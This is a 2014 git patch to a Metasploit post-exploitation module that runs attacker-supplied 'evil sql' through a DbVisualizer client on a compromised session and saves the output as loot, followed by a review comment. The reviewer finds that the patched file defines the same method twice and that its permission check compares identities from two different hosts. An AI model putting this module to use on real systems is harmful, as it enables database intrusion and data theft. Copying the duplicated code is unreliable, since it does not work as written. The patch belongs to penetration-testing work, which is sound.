From 200c122ecd4453827380d24da3f49b05fe51e54b Mon Sep 17 00:00:00 2001
From: David Bloom
Date: Wed, 16 Jul 2014 18:48:15 +0200
Subject: [PATCH] Update dbvis_query.rb
---
 modules/post/multi/manage/dbvis_query.rb | 64 ++++++++++++++++++------
 1 file changed, 48 insertions(+), 16 deletions(-)
diff --git a/modules/post/multi/manage/dbvis_query.rb b/modules/post/multi/manage/dbvis_query.rb
index 56825b4df3..cf19243d77 100644
--- a/modules/post/multi/manage/dbvis_query.rb
+++ b/modules/post/multi/manage/dbvis_query.rb
@@ -177,27 +177,59 @@ class Metasploit3 < Msf::Post
 return dbvis
 end
+ # Query execution method
 def dbvis_query(dbvis,sql)
 error =false
 resp=''
 if file?(dbvis)==true
- print_status("Trying to execute evil sql, it can take time ...")
- args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
- dbvis ="\"#{dbvis}\""
- cmd = "#{dbvis} #{args}"
- resp = cmd_exec(cmd)
- print_line("")
- print_line("#{resp}")
- # store qury and result
- p = store_loot(
- "dbvis.query",
- "text/plain",
- session,
- resp.to_s,
- "dbvis_query.txt",
- "dbvis query")
- print_good("Query stored in: #{p.to_s}")
+ f = session.fs.file.stat(dbvis)
+ if f.uid == Process.euid or Process.groups.include?f.gid
+ print_status("Trying to execute evil sql, it can take time ...")
+ args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
+ dbvis ="\"#{dbvis}\""
+ cmd = "#{dbvis} #{args}"
+ resp = cmd_exec(cmd)
+ vprint_line("")
+ vprint_status("#{resp}")
+ if resp =~ /denied|failed/i
+ error = true
+ end
+ else
+ print_error("User doesn't have enough rights to execute dbviscmd, aborting")
+ end
+ else
+ print_error("#{dbvis} is not a file")
+ end
+ return error
+ end
+
+ # Query execution method
+ def dbvis_query(dbvis,sql)
+ error =false
+ resp=''
+ if file?(dbvis)==true
+ f = session.fs.file.stat(dbvis)
+ if f.uid == Process.euid or Process.groups.include?f.gid
+ print_status("Trying to execute evil sql, it can take time ...")
+ args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
+ dbvis ="\"#{dbvis}\""
+ cmd = "#{dbvis} #{args}"
+ resp = cmd_exec(cmd)
+ print_line("")
+ print_line("#{resp}")
+ # store qury and result
+ p = store_loot(
+ "dbvis.query",
+ "text/plain",
+ session,
+ resp.to_s,
+ "dbvis_query.txt",
+ "dbvis query")
+ print_good("Query stored in: #{p.to_s}")
+ else
+ print_error("User doesn't have enough rights to execute dbviscmd, aborting")
+ end
 else
 print_error("#{dbvis} is not a file")
 end
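Review bot: The new side defines `dbvis_query(dbvis,sql)` twice in the same class, so Ruby keeps only the second definition and the first body (the `vprint_*` output and the `resp =~ /denied|failed/i` check that sets `error`) is never run. Keep one method, or give the first a distinct name, and carry the failure check into the surviving body as `error = true if resp =~ /denied|failed/i`; within the hunk the surviving body never assigns `error` after initialising it. Separately, `Process.euid` and `Process.groups` are evaluated in the framework's own Ruby process while `f` comes from `session.fs.file.stat`, so the ownership test appears to compare identities from two different hosts and can report "not enough rights" for reasons unrelated to the file. The second definition's closing lines fall outside the hunk.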